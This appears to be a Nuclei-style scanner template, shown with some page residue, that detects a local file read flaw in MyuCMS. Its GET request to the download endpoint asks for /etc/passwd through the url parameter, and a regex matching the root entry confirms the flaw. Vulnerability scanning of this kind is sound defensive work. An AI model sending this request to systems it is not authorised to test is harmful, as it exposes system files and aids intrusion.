17 lines
384 B
YAML
17 lines
384 B
YAML
id: myucms-lfr
|
|
info:
|
|
name: MyuCMS Local File Read
|
|
author: princechaddha
|
|
severity: high
|
|
tags: myucms,lfi
|
|
reference: https://blog.csdn.net/yalecaltech/article/details/104908257
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1"
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|